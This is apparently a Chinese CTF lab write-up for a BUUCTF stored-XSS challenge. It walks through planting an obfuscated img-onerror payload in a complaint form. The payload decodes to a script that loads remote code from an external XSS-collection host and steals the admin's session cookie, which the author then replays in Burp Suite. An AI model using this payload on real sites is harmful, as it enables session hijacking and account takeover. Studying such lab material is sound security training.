【BUUCTF】BUU XSS COURSE 11

进入题目页面如下,有吐槽和登录两个可注入点

根据题目可知是一道XSS

登陆界面没有注册,尝试简单的SQL注入也不行

回到吐槽界面,输入简单的xss代码

<script>alert(1)</script>

访问网址,发现回显不出来,猜测是存储型xss,通过吐槽功能插入xss代码,获取cookie登录后台

可以使用下面这个平台,创建项目

​​​​​​XSS安全平台

复制代码
'"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vdWouY2kvZXplIjtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw== onerror=eval(atob(this.id))>

获取到了 cookie : PHPSESSID=37fe83cc4c3fe53c0686b2029c4cab43

后台路径 http://web/backend/admin.php

根据提示构造url并访问

4276ae11-be9b-4384-bfae-75839de9d1b2.node5.buuoj.cn:81/backend/admin.php

还没改cookie qyq

在burp suite中改cookie值并放行

再次访问,最终得到flag

相关推荐
希望奇迹很安静2 分钟前
[极客大挑战 2019]PHP
开发语言·学习·web安全·php·ctf·buuctf
ThisIsClark19 分钟前
【gopher的java学习笔记】Java中Service与Mapper的关系详解
java·笔记·学习
小安运维日记20 分钟前
CKS认证 | Day1 K8s集群部署与安全配置
运维·网络·安全·容器·kubernetes
程序员WANG31 分钟前
论文+AI赋能教育:探索变革路径与创新实践。包括word和pdf格式。
人工智能·学习·pdf·教育·变革
数据猿41 分钟前
2025展望:“安全计算”平价时代加速到来,数据流通产业兴起
安全
123yhy传奇1 小时前
【学习总结|DAY034】Maven高级
java·学习·maven
高精度计算机视觉1 小时前
如何用vscode断点调试Vue.js的项目
笔记
我们的五年1 小时前
【Linux课程学习】:锁封装(Mutex)线程封装(Thread),this指针
linux·服务器·c语言·c++·学习
fechild2 小时前
npm和webpack学习
学习·webpack·npm
Icoolkj2 小时前
微服务学习-Sentinel 限流保护服务
学习·微服务·sentinel